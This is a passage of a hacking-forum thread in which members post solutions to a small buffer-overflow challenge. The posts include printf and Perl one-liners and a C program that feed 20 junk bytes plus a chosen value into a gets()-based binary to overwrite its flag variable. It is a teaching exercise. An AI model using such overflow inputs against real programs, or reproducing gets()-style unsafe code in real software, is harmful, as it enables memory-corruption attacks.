Page 2 of 2 FirstFirst 12
Results 11 to 19 of 19

Thread: BuYS - Understanding functions!!! Share/Save - My123World.Com!

  1. #11
    super liked. solved
    P.S: if you find gdb dull, you can always try DDD. It a fancy GUI around gdb..& much more fun.
    For ubuntu fellas : "sudo apt-get install ddd"
    Last edited by Aodrulez; 03-29-2011 at 01:29 AM.
    All it takes, is persistence.

    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  2. #12
    But the truth is, technically there can be multiple solutions to this one, although..the most basic one is goin to be the most Reliable one.
    All it takes, is persistence.

    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  3. #13
    Garage Member
    Join Date
    Sep 2010
    Location
    Chennai
    Posts
    83
    Blog Entries
    1
    Quote Originally Posted by Aodrulez View Post
    super liked. solved
    P.S: if you find gdb dull, you can always try DDD. It a fancy GUI around gdb..& much more fun.
    For ubuntu fellas : "sudo apt-get install ddd"
    Thankz and congrats for solving..

    @abhay: gets() is different from strcpy() ..finding out the difference is the way to solve this

  4. #14
    Super Commando Dhruv abhaythehero's Avatar
    Join Date
    Sep 2010
    Location
    Lucknow/Pune,India
    Posts
    466
    Blog Entries
    2
    yo got this time !! PM Sent !

    also thanks to Aodrulez and you for giving hints
    In the world of 0s and 1s, are you a zero or The One !

  5. #15
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    Andro DDD thats new , I will give it a try I find gdb very hard to use.
    Hacking Is a Matter of Time Knowledge and Patience

  6. #16
    Garage Member
    Join Date
    Sep 2010
    Location
    Chennai
    Posts
    83
    Blog Entries
    1
    Hey this is the end of this thread ..hope u all had a gr8 time solving this... Btw i received correct solutions from b0nd, silentph33r and abhay..Congrats guys .

    Ok the solution is as follows ...

    Ideally it will take 24 bytes to overflow the flag variable.
    Now the thing that may confuse you is the \x00 byte which is the string terminator.. But gets() doesnt consider \x00 as the string terminator, it considers \n(\xa) as the string terminator.. So all you need to give is 20 bytes of junk + 0x41420043 in little endian format

    Like this...
    assume the program object file is named test...

    then ,
    $printf "%020x\x43\x00\x42\x41" | test
    you win
    $
    Hope you enjoyed this...
    For the next one ..goto http://www.garage4hackers.com/showth...ted=1#post3359

  7. #17
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744


    The Rule says... "3. You have to post all the replies (either correct or incorrect) of other members which you received via Private Message (PM)."
    http://www.garage4hackers.com/showth...Before-Posting
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  8. #18
    My sweet n simple solution:
    perl -e 'print "AAAAAAAAAAAAAAAAAAAAC\x00BA"' | ./garage
    (btw, i compiled the code as "garage")
    All it takes, is persistence.

    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  9. #19
    Garage Member
    Join Date
    Sep 2010
    Location
    Chennai
    Posts
    83
    Blog Entries
    1
    Quote Originally Posted by b0nd View Post


    The Rule says... "3. You have to post all the replies (either correct or incorrect) of other members which you received via Private Message (PM)."
    http://www.garage4hackers.com/showth...Before-Posting
    My bad !!!

    1st answer from silent ph33r was a image..so not including it!!! Coz answer is the same as b0nd

    2nd answer from b0nd :

    Finally the following code would do the job:
    # perl -e 'print "A"x20 . "\x43\x00\x42\x41";cat' | ./test
    and the last from abhay

    Here is the program that prints you win >>

    #include<stdio.h>
    #include<stdlib.h>
    #include<string.h>

    main()
    {
    int x;

    for(x=1;x<=20;x++)
    printf("%c",'A');//can be anything does not matter
    //For filling the initial 20 bytes buffer

    printf("%c",'C');
    printf("%c",'\x00');
    printf("%c",'B');
    printf("%c",'A');

    // after compiling this program pipe it to the code compiled (given in question)

    }

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •